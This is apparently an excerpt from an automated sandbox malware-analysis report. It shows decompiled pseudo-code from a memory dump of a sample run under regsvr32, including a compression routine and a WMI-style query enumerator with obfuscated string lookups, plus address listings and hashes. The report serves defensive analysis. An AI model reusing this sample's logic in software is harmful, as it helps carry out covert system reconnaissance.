            • Opcode Fuzzy Hash: a30bf8f36294ea15e62829ed31cda25f7f7d415ede12237d95b1e638ad1e5e8b
            • Instruction Fuzzy Hash: 65C01261A0020A97CF14ABA5B9166EEB2FC5B48549F140495ED02F10C1EA60D99542B0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E031782A0(intOrPtr _a4, signed int _a8, signed int _a12) {
            				signed int _v8;
            				signed short* _v12;
            				char _v16;
            				signed short _v20;
            				unsigned int _v24;
            				signed short _v28;
            				signed int _t223;
            				signed int _t235;
            				signed int _t237;
            				signed short _t240;
            				signed int _t241;
            				signed short _t244;
            				signed int _t245;
            				signed short _t248;
            				signed int _t249;
            				signed int _t250;
            				void* _t254;
            				signed char _t259;
            				signed int _t275;
            				signed int _t289;
            				signed int _t308;
            				signed short _t316;
            				signed int _t321;
            				void* _t329;
            				signed short _t330;
            				signed short _t333;
            				signed short _t334;
            				signed short _t343;
            				signed short _t346;
            				signed short _t347;
            				signed short _t348;
            				signed short _t358;
            				signed short _t361;
            				signed short _t362;
            				signed short _t363;
            				signed short _t370;
            				signed int _t373;
            				signed int _t378;
            				signed short _t379;
            				signed short _t382;
            				unsigned int _t388;
            				unsigned short _t390;
            				unsigned short _t392;
            				unsigned short _t394;
            				signed int _t396;
            				signed int _t397;
            				signed int _t398;
            				signed int _t400;
            				signed short _t401;
            				signed int _t402;
            				signed int _t403;
            				signed int _t407;
            				signed int _t409;
            
            				_t223 = _a8;
            				_t235 =  *(_t223 + 2) & 0x0000ffff;
            				_push(_t397);
            				_t388 = 0;
            				_t398 = _t397 | 0xffffffff;
            				if(_a12 < 0) {
            					L42:
            					return _t223;
            				} else {
            					_t329 =  !=  ? 7 : 0x8a;
            					_v12 = _t223 + 6;
            					_t254 = (0 | _t235 != 0x00000000) + 3;
            					_v16 = _a12 + 1;
            					do {
            						_v24 = _t388;
            						_t388 = _t388 + 1;
            						_a8 = _t235;
            						_a12 = _t235;
            						_v8 =  *_v12 & 0x0000ffff;
            						_t223 = _a4;
            						if(_t388 >= _t329) {
            							L4:
            							if(_t388 >= _t254) {
            								if(_a8 == 0) {
            									_t122 = _t223 + 0x16bc; // 0x5d08408b
            									_t400 =  *_t122;
            									if(_t388 > 0xa) {
            										_t168 = _t223 + 0xac4; // 0xfeacb58c
            										_t330 =  *_t168 & 0x0000ffff;
            										_t169 = _t223 + 0xac6; // 0xfffffeac
            										_t237 =  *_t169 & 0x0000ffff;
            										_v24 = _t330;
            										_t171 = _t223 + 0x16b8; // 0x5750038
            										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
            										_v28 = _t333;
            										if(_t400 <= 0x10 - _t237) {
            											_t259 = _t400 + _t237;
            										} else {
            											_t173 = _t223 + 0x14; // 0xc703f045
            											 *(_t223 + 0x16b8) = _t333;
            											_t175 = _t223 + 8; // 0x8d000040
            											 *((char*)( *_t175 +  *_t173)) = _v28;
            											_t223 = _a4;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t181 = _t223 + 0x14; // 0xc703f045
            											_t182 = _t223 + 8; // 0x8d000040
            											_t183 = _t223 + 0x16b9; // 0x8b057500
            											 *((char*)( *_t181 +  *_t182)) =  *_t183;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t333 = _v24 >> 0x10;
            											_t189 = _t223 + 0x16bc; // 0x5d08408b
            											_t259 =  *_t189 + 0xfffffff0 + _t237;
            										}
            										_t334 = _t333 & 0x0000ffff;
            										 *(_t223 + 0x16bc) = _t259;
            										 *(_t223 + 0x16b8) = _t334;
            										_t401 = _t334 & 0x0000ffff;
            										if(_t259 <= 9) {
            											_t209 = _t388 - 0xb; // -10
            											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
            											 *(_t223 + 0x16bc) = _t259 + 7;
            										} else {
            											_t193 = _t223 + 8; // 0x8d000040
            											_t390 = _t388 + 0xfffffff5;
            											_t194 = _t223 + 0x14; // 0xc703f045
            											_t240 = _t390 << _t259 | _t401;
            											 *(_t223 + 0x16b8) = _t240;
            											 *( *_t193 +  *_t194) = _t240;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t199 = _t223 + 0x14; // 0xc703f045
            											_t200 = _t223 + 8; // 0x8d000040
            											_t201 = _t223 + 0x16b9; // 0x8b057500
            											 *((char*)( *_t199 +  *_t200)) =  *_t201;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
            											 *(_t223 + 0x16b8) = _t390 >> 0x10;
            										}
            										goto L35;
            									}
            									_t123 = _t223 + 0xac0; // 0x3fc458b
            									_t343 =  *_t123 & 0x0000ffff;
            									_t124 = _t223 + 0xac2; // 0xb58c03fc
            									_t241 =  *_t124 & 0x0000ffff;
            									_v24 = _t343;
            									_t126 = _t223 + 0x16b8; // 0x5750038
            									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
            									_v28 = _t346;
            									if(_t400 > 0x10 - _t241) {
            										_t128 = _t223 + 0x14; // 0xc703f045
            										 *(_t223 + 0x16b8) = _t346;
            										_t130 = _t223 + 8; // 0x8d000040
            										 *((char*)( *_t130 +  *_t128)) = _v28;
            										_t223 = _a4;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t136 = _t223 + 0x14; // 0xc703f045
            										_t137 = _t223 + 8; // 0x8d000040
            										_t138 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t136 +  *_t137)) =  *_t138;
            										_t142 = _t223 + 0x16bc; // 0x5d08408b
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t346 = _v24 >> 0x10;
            										_t400 =  *_t142 + 0xfffffff0;
            									}
            									_t403 = _t400 + _t241;
            									_t347 = _t346 & 0x0000ffff;
            									 *(_t223 + 0x16bc) = _t403;
            									 *(_t223 + 0x16b8) = _t347;
            									_t348 = _t347 & 0x0000ffff;
            									if(_t403 <= 0xd) {
            										_t163 = _t403 + 3; // 0x5d08408e
            										_t275 = _t163;
            										L28:
            										 *(_t223 + 0x16bc) = _t275;
            										_t165 = _t388 - 3; // -2
            										_t166 = _t223 + 0x16b8; // 0x5750038
            										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
            									} else {
            										_t392 = _t388 + 0xfffffffd;
            										_t147 = _t223 + 0x14; // 0xc703f045
            										_t244 = _t392 << _t403 | _t348;
            										_t148 = _t223 + 8; // 0x8d000040
            										 *(_t223 + 0x16b8) = _t244;
            										 *( *_t148 +  *_t147) = _t244;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t153 = _t223 + 0x14; // 0xc703f045
            										_t154 = _t223 + 8; // 0x8d000040
            										_t155 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t153 +  *_t154)) =  *_t155;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
            										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
            									}
            									goto L35;
            								}
            								_t289 = _a12;
            								if(_t289 != _t398) {
            									_t53 = _t289 * 4; // 0xfffffeac
            									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
            									_t56 = _t235 * 4; // 0xfeac8d94
            									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
            									_t58 = _t223 + 0x16bc; // 0x5d08408b
            									_t407 =  *_t58;
            									_v28 = _t370;
            									_t60 = _t223 + 0x16b8; // 0x5750038
            									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
            									if(_t407 <= 0x10 - _t396) {
            										_t373 = _t249;
            										_t308 = _t407 + _t396;
            									} else {
            										_t61 = _t223 + 0x14; // 0xc703f045
            										_t62 = _t223 + 8; // 0x8d000040
            										 *(_t223 + 0x16b8) = _t249;
            										 *( *_t62 +  *_t61) = _t249;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t67 = _t223 + 0x14; // 0xc703f045
            										_t68 = _t223 + 8; // 0x8d000040
            										_t69 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t67 +  *_t68)) =  *_t69;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t75 = _t223 + 0x16bc; // 0x5d08408b
            										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
            										_t308 =  *_t75 + 0xfffffff0 + _t396;
            									}
            									_t388 = _v24;
            									 *(_t223 + 0x16bc) = _t308;
            									 *(_t223 + 0x16b8) = _t373;
            								}
            								_t80 = _t223 + 0xabc; // 0xc80bc323
            								_t358 =  *_t80 & 0x0000ffff;
            								_t81 = _t223 + 0x16bc; // 0x5d08408b
            								_t402 =  *_t81;
            								_t82 = _t223 + 0xabe; // 0x458bc80b
            								_t245 =  *_t82 & 0x0000ffff;
            								_v24 = _t358;
            								_t84 = _t223 + 0x16b8; // 0x5750038
            								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
            								_v28 = _t361;
            								if(_t402 > 0x10 - _t245) {
            									_t86 = _t223 + 0x14; // 0xc703f045
            									 *(_t223 + 0x16b8) = _t361;
            									_t88 = _t223 + 8; // 0x8d000040
            									 *((char*)( *_t88 +  *_t86)) = _v28;
            									_t223 = _a4;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t94 = _t223 + 0x14; // 0xc703f045
            									_t95 = _t223 + 8; // 0x8d000040
            									_t96 = _t223 + 0x16b9; // 0x8b057500
            									 *((char*)( *_t94 +  *_t95)) =  *_t96;
            									_t100 = _t223 + 0x16bc; // 0x5d08408b
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t361 = _v24 >> 0x10;
            									_t402 =  *_t100 + 0xfffffff0;
            								}
            								_t403 = _t402 + _t245;
            								_t362 = _t361 & 0x0000ffff;
            								 *(_t223 + 0x16bc) = _t403;
            								 *(_t223 + 0x16b8) = _t362;
            								_t363 = _t362 & 0x0000ffff;
            								if(_t403 <= 0xe) {
            									_t121 = _t403 + 2; // 0x5d08408d
            									_t275 = _t121;
            									goto L28;
            								} else {
            									_t394 = _t388 + 0xfffffffd;
            									_t105 = _t223 + 0x14; // 0xc703f045
            									_t248 = _t394 << _t403 | _t363;
            									_t106 = _t223 + 8; // 0x8d000040
            									 *(_t223 + 0x16b8) = _t248;
            									 *( *_t106 +  *_t105) = _t248;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t111 = _t223 + 0x14; // 0xc703f045
            									_t112 = _t223 + 8; // 0x8d000040
            									_t113 = _t223 + 0x16b9; // 0x8b057500
            									 *((char*)( *_t111 +  *_t112)) =  *_t113;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
            									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
            									goto L35;
            								}
            							} else {
            								_t316 = _t223 + (_t235 + 0x29f) * 4;
            								_v28 = _t316;
            								do {
            									_t378 = _a12;
            									_t22 = _t223 + 0x16bc; // 0x5d08408b
            									_t409 =  *_t22;
            									_t24 = _t378 * 4; // 0xfffffeac
            									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
            									_t379 =  *_t316 & 0x0000ffff;
            									_v24 = _t379;
            									_t27 = _t223 + 0x16b8; // 0x5750038
            									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
            									_v20 = _t382;
            									if(_t409 <= 0x10 - _t250) {
            										_t321 = _t409 + _t250;
            									} else {
            										_t29 = _t223 + 0x14; // 0xc703f045
            										 *(_t223 + 0x16b8) = _t382;
            										_t31 = _t223 + 8; // 0x8d000040
            										 *((char*)( *_t31 +  *_t29)) = _v20;
            										_t223 = _a4;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t37 = _t223 + 0x14; // 0xc703f045
            										_t38 = _t223 + 8; // 0x8d000040
            										_t39 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t37 +  *_t38)) =  *_t39;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t382 = _v24 >> 0x10;
            										_t45 = _t223 + 0x16bc; // 0x5d08408b
            										_t321 =  *_t45 + 0xfffffff0 + _t250;
            									}
            									 *(_t223 + 0x16bc) = _t321;
            									_t316 = _v28;
            									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
            									_t388 = _t388 - 1;
            								} while (_t388 != 0);
            								L35:
            								_t235 = _v8;
            								_t388 = 0;
            								_t398 = _a12;
            								if(_t235 != 0) {
            									if(_a8 != _t235) {
            										_t329 = 7;
            										_t217 = _t329 - 3; // 0x4
            										_t254 = _t217;
            									} else {
            										_t329 = 6;
            										_t216 = _t329 - 3; // 0x3
            										_t254 = _t216;
            									}
            								} else {
            									_t329 = 0x8a;
            									_t214 = _t388 + 3; // 0x3
            									_t254 = _t214;
            								}
            								goto L41;
            							}
            						}
            						_t223 = _a4;
            						if(_t235 == _v8) {
            							_t235 = _v8;
            							goto L41;
            						}
            						goto L4;
            						L41:
            						_v12 =  &(_v12[2]);
            						_t221 =  &_v16;
            						 *_t221 = _v16 - 1;
            					} while ( *_t221 != 0);
            					goto L42;
            				}
            			}

            (instruction address column for the E031782A0 listing above: 168 entries, 0x031782a3 to 0x03178462; 0x00000000 marks lines without an address)
            0x03178462
            0x03178469
            0x03178469
            0x03178471
            0x03178471
            0x03178478
            0x03178485
            0x0317848e
            0x03178491
            0x03178496
            0x03178498
            0x0317849b
            0x031784a2
            0x031784a8
            0x031784ab
            0x031784ae
            0x031784b1
            0x031784b4
            0x031784b7
            0x031784bd
            0x031784cb
            0x031784d1
            0x031784d4
            0x031784d7
            0x031784d7
            0x031784da
            0x031784dc
            0x031784df
            0x031784e5
            0x031784ec
            0x031784f2
            0x0317854b
            0x0317854b
            0x00000000
            0x031784f4
            0x031784f4
            0x031784ff
            0x03178502
            0x03178505
            0x03178508
            0x0317850f
            0x03178512
            0x03178515
            0x03178518
            0x0317851b
            0x03178521
            0x0317852d
            0x03178532
            0x0317853f
            0x00000000
            0x0317853f
            0x03178314
            0x0317831a
            0x0317831d
            0x03178320
            0x03178320
            0x03178323
            0x03178323
            0x03178329
            0x03178329
            0x03178331
            0x03178336
            0x03178343
            0x0317834c
            0x0317834f
            0x03178354
            0x0317839c
            0x03178356
            0x03178356
            0x03178359
            0x03178360
            0x03178366
            0x03178369
            0x0317836c
            0x0317836f
            0x03178372
            0x03178375
            0x0317837b
            0x03178389
            0x0317838c
            0x0317838f
            0x03178398
            0x03178398
            0x031783a2
            0x031783a8
            0x031783ab
            0x031783b2
            0x031783b2
            0x03178765
            0x03178765
            0x03178768
            0x0317876a
            0x0317876f
            0x0317877e
            0x0317878a
            0x0317878f
            0x0317878f
            0x03178780
            0x03178780
            0x03178785
            0x03178785
            0x03178785
            0x03178771
            0x03178771
            0x03178776
            0x03178776
            0x03178776
            0x00000000
            0x0317876f
            0x0317830e
            0x03178303
            0x03178306
            0x03178794
            0x00000000
            0x03178794
            0x00000000
            0x03178797
            0x03178797
            0x0317879b
            0x0317879b
            0x0317879b
            0x00000000
            0x031782e4

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction ID: 078c2fae943261a600a85a817b2cbc9d802b6346d5b36d7a1ebb98a9c67f9716
            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction Fuzzy Hash: 87F160756092218FC709CF18C4D88F67BF5AFA9310B1E82FDD8899B3A6D7319980CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 25efd792c6f9a9a632d61f153d75c9f2630d9668a2ca7ffb9a8bc530088649be
            • Instruction ID: c4891fbc35c26fb2f3b0131d9c07e9949a9d8ddc803d0cd224446f8dac01de06
            • Opcode Fuzzy Hash: 25efd792c6f9a9a632d61f153d75c9f2630d9668a2ca7ffb9a8bc530088649be
            • Instruction Fuzzy Hash: EC7158316101A54FDB1CDE1EE8D047973B1E78E30235D451EE986CB389C635E56ADBB0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 51b2aec972c6c31ada5728095afd5273e5fb41b106dcebc8ba99730c4c2b993a
            • Instruction ID: 63c7a77fe175552932321a52941f246227d45e477ff28075ff20a66c7b62bac7
            • Opcode Fuzzy Hash: 51b2aec972c6c31ada5728095afd5273e5fb41b106dcebc8ba99730c4c2b993a
            • Instruction Fuzzy Hash: 5A517BB3B041B00BDF68CE3D8C642757ED35AD915170EC2B6F9A9CB24AE978C7059760
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f6131ebf6223bb6e2460bd414e444af3ca40f28b1903113cf83fa3e7fa3a95ed
            • Instruction ID: fa804efa6fac9ded1e0bf40734926c3a994320613830abdeefdac56995693c3f
            • Opcode Fuzzy Hash: f6131ebf6223bb6e2460bd414e444af3ca40f28b1903113cf83fa3e7fa3a95ed
            • Instruction Fuzzy Hash: 7E21413A6154128BD35CDF2CD4A5A69F3A5FB48210F85427ED517CB682CB61E492CBC1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0316EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				void* _v28;
            				signed int _v32;
            				char _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v48;
            				char _v52;
            				intOrPtr _v56;
            				signed int _v60;
            				char* _v72;
            				signed short _v80;
            				signed int _v84;
            				char _v88;
            				char _v92;
            				char _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v616;
            				intOrPtr* _t159;
            				char _t165;
            				signed int _t166;
            				signed int _t173;
            				signed int _t178;
            				signed int _t186;
            				intOrPtr* _t187;
            				signed int _t188;
            				signed int _t192;
            				intOrPtr* _t193;
            				intOrPtr _t200;
            				intOrPtr* _t205;
            				signed int _t207;
            				signed int _t209;
            				intOrPtr* _t210;
            				intOrPtr _t212;
            				intOrPtr* _t213;
            				signed int _t214;
            				char _t217;
            				signed int _t218;
            				signed int _t219;
            				signed int _t230;
            				signed int _t235;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				intOrPtr* _t247;
            				intOrPtr* _t251;
            				signed int _t252;
            				intOrPtr* _t253;
            				void* _t255;
            				intOrPtr* _t261;
            				signed int _t262;
            				signed int _t283;
            				signed int _t289;
            				char* _t298;
            				void* _t320;
            				signed int _t322;
            				intOrPtr* _t323;
            				intOrPtr _t324;
            				signed int _t327;
            				intOrPtr* _t328;
            				intOrPtr* _t329;
            
            				_v32 = _v32 & 0x00000000;
            				_v60 = _v60 & 0x00000000;
            				_v56 = __edx;
            				_v100 = __ecx;
            				_t159 = E0316E485(__ecx);
            				_t251 = _t159;
            				_v104 = _t251;
            				if(_t251 == 0) {
            					return _t159;
            				}
            				_t320 = E03168DC9(0x10);
            				_v36 = _t320;
            				_pop(_t255);
            				if(_t320 == 0) {
            					L53:
            					E03168DDF( &_v60, 0xfffffffe);
            					E0316E539( &_v104);
            					return _t320;
            				}
            				_t165 = E03169F85(_t255, 0xcdd);
            				 *_t328 = 0x6b4;
            				_v52 = _t165;
            				_t166 = E03169F85(_t255);
            				_push(0);
            				_push(_v56);
            				_v20 = _t166;
            				_push(_t166);
            				_push(_a4);
            				_t322 = E03169C50(_t165);
            				_v60 = _t322;
            				E03168D9A( &_v52);
            				E03168D9A( &_v20);
            				_t329 = _t328 + 0x20;
            				if(_t322 != 0) {
            					_t323 = __imp__#2;
            					_v40 =  *_t323(_t322);
            					_t173 = E03169F85(_t255, 0xc93);
            					_v20 = _t173;
            					_v52 =  *_t323(_t173);
            					E03168D9A( &_v20);
            					_t324 = _v40;
            					_t261 =  *_t251;
            					_t252 = 0;
            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
            					__eflags = _t178;
            					if(_t178 != 0) {
            						L52:
            						__imp__#6(_t324);
            						__imp__#6(_v52);
            						goto L53;
            					}
            					_t262 = _v32;
            					_v28 = 0;
            					_v20 = 0;
            					__eflags = _t262;
            					if(_t262 == 0) {
            						L49:
            						 *((intOrPtr*)( *_t262 + 8))(_t262);
            						__eflags = _t252;
            						if(_t252 == 0) {
            							E03168DDF( &_v36, 0);
            							_t320 = _v36;
            						} else {
            							 *(_t320 + 8) = _t252;
            							 *_t320 = E03169AB3(_v100);
            							 *((intOrPtr*)(_t320 + 4)) = E03169AB3(_v56);
            						}
            						goto L52;
            					} else {
            						goto L6;
            					}
            					while(1) {
            						L6:
            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
            						__eflags = _t186;
            						if(_t186 != 0) {
            							break;
            						}
            						_v16 = 0;
            						_v48 = 0;
            						_v12 = 0;
            						_v24 = 0;
            						__eflags = _v84;
            						if(_v84 == 0) {
            							break;
            						}
            						_t187 = _v28;
            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
            						__eflags = _t188;
            						if(_t188 >= 0) {
            							__imp__#20(_v24, 1,  &_v16);
            							__imp__#19(_v24, 1,  &_v48);
            							_t46 = _t320 + 0xc; // 0xc
            							_t253 = _t46;
            							_t327 = _t252 << 3;
            							_t47 = _t327 + 8; // 0x8
            							_t192 = E03168E5D(_t327, _t47);
            							__eflags = _t192;
            							if(_t192 == 0) {
            								__imp__#16(_v24);
            								_t193 = _v28;
            								 *((intOrPtr*)( *_t193 + 8))(_t193);
            								L46:
            								_t252 = _v20;
            								break;
            							}
            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E03168DC9( *(_t327 +  *_t253) << 3);
            							_t200 =  *_t253;
            							__eflags =  *(_t327 + _t200 + 4);
            							if( *(_t327 + _t200 + 4) == 0) {
            								_t136 = _t320 + 0xc; // 0xc
            								E03168DDF(_t136, 0);
            								E03168DDF( &_v36, 0);
            								__imp__#16(_v24);
            								_t205 = _v28;
            								 *((intOrPtr*)( *_t205 + 8))(_t205);
            								_t320 = _v36;
            								goto L46;
            							}
            							_t207 = _v16;
            							while(1) {
            								_v12 = _t207;
            								__eflags = _t207 - _v48;
            								if(_t207 > _v48) {
            									break;
            								}
            								_v44 = _v44 & 0x00000000;
            								_t209 =  &_v12;
            								__imp__#25(_v24, _t209,  &_v44);
            								__eflags = _t209;
            								if(_t209 < 0) {
            									break;
            								}
            								_t212 = E03169AB3(_v44);
            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
            								_t213 = _v28;
            								_t281 =  *_t213;
            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
            								__eflags = _t214;
            								if(_t214 < 0) {
            									L39:
            									__imp__#6(_v44);
            									_t207 = _v12 + 1;
            									__eflags = _t207;
            									continue;
            								}
            								_v92 = E03169F85(_t281, 0xcc1);
            								 *_t329 = 0xabe;
            								_t217 = E03169F85(_t281);
            								_t283 = _v80;
            								_v96 = _t217;
            								_t218 = _t283 & 0x0000ffff;
            								__eflags = _t218 - 0xb;
            								if(__eflags > 0) {
            									_t219 = _t218 - 0x10;
            									__eflags = _t219;
            									if(_t219 == 0) {
            										L35:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03168DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											L38:
            											E03168D9A( &_v92);
            											E03168D9A( &_v96);
            											__imp__#9( &_v80);
            											goto L39;
            										}
            										_push(_v72);
            										_push(L"%d");
            										L37:
            										_push(0xc);
            										_push(_t289);
            										E03169FE4();
            										_t329 = _t329 + 0x10;
            										goto L38;
            									}
            									_t230 = _t219 - 1;
            									__eflags = _t230;
            									if(_t230 == 0) {
            										L33:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03168DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											goto L38;
            										}
            										_push(_v72);
            										_push(L"%u");
            										goto L37;
            									}
            									_t235 = _t230 - 1;
            									__eflags = _t235;
            									if(_t235 == 0) {
            										goto L33;
            									}
            									__eflags = _t235 == 1;
            									if(_t235 == 1) {
            										goto L33;
            									}
            									L28:
            									__eflags = _t283 & 0x00002000;
            									if((_t283 & 0x00002000) == 0) {
            										_v88 = E03169F85(_t283, 0x2a);
            										E03169FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
            										E03168D9A( &_v88);
            										_t329 = _t329 + 0x18;
            										_t298 =  &_v616;
            										L31:
            										_t242 = E03169AB3(_t298);
            										L32:
            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
            										goto L38;
            									}
            									_t242 = E0316E9AE( &_v80);
            									goto L32;
            								}
            								if(__eflags == 0) {
            									__eflags = _v72 - 0xffff;
            									_t298 = L"TRUE";
            									if(_v72 != 0xffff) {
            										_t298 = L"FALSE";
            									}
            									goto L31;
            								}
            								_t243 = _t218 - 1;
            								__eflags = _t243;
            								if(_t243 == 0) {
            									goto L38;
            								}
            								_t244 = _t243 - 1;
            								__eflags = _t244;
            								if(_t244 == 0) {
            									goto L35;
            								}
            								_t245 = _t244 - 1;
            								__eflags = _t245;
            								if(_t245 == 0) {
            									goto L35;
            								}
            								__eflags = _t245 != 5;
            								if(_t245 != 5) {
            									goto L28;
            								}
            								_t298 = _v72;
            								goto L31;
            							}
            							__imp__#16(_v24);
            							_t210 = _v28;
            							 *((intOrPtr*)( *_t210 + 8))(_t210);
            							_t252 = _v20;
            							L42:
            							_t262 = _v32;
            							_t252 = _t252 + 1;
            							_v20 = _t252;
            							__eflags = _t262;
            							if(_t262 != 0) {
            								continue;
            							}
            							L48:
            							_t324 = _v40;
            							goto L49;
            						}
            						_t247 = _v28;
            						 *((intOrPtr*)( *_t247 + 8))(_t247);
            						goto L42;
            					}
            					_t262 = _v32;
            					goto L48;
            				} else {
            					E03168DDF( &_v36, _t322);
            					_t320 = _v36;
            					goto L53;
            				}
            			}

            0x0316ead3
            0x0316ead9
            0x0316eae0
            0x0316eae3
            0x0316eae6
            0x0316eaeb
            0x0316eaed
            0x0316eaf2
            0x0316ef37
            0x0316ef37
            0x0316eaff
            0x0316eb01
            0x0316eb04
            0x0316eb07
            0x0316ef1c
            0x0316ef22
            0x0316ef2c
            0x00000000
            0x0316ef31
            0x0316eb12
            0x0316eb19
            0x0316eb20
            0x0316eb23
            0x0316eb28
            0x0316eb2a
            0x0316eb2d
            0x0316eb30
            0x0316eb31
            0x0316eb3a
            0x0316eb40
            0x0316eb43
            0x0316eb4c
            0x0316eb51
            0x0316eb56
            0x0316eb6d
            0x0316eb7a
            0x0316eb7d
            0x0316eb84
            0x0316eb89
            0x0316eb90
            0x0316eb95
            0x0316eb9c
            0x0316eb9e
            0x0316ebaa
            0x0316ebad
            0x0316ebaf
            0x0316ef0c
            0x0316ef0d
            0x0316ef16
            0x00000000
            0x0316ef16
            0x0316ebb5
            0x0316ebb8
            0x0316ebbb
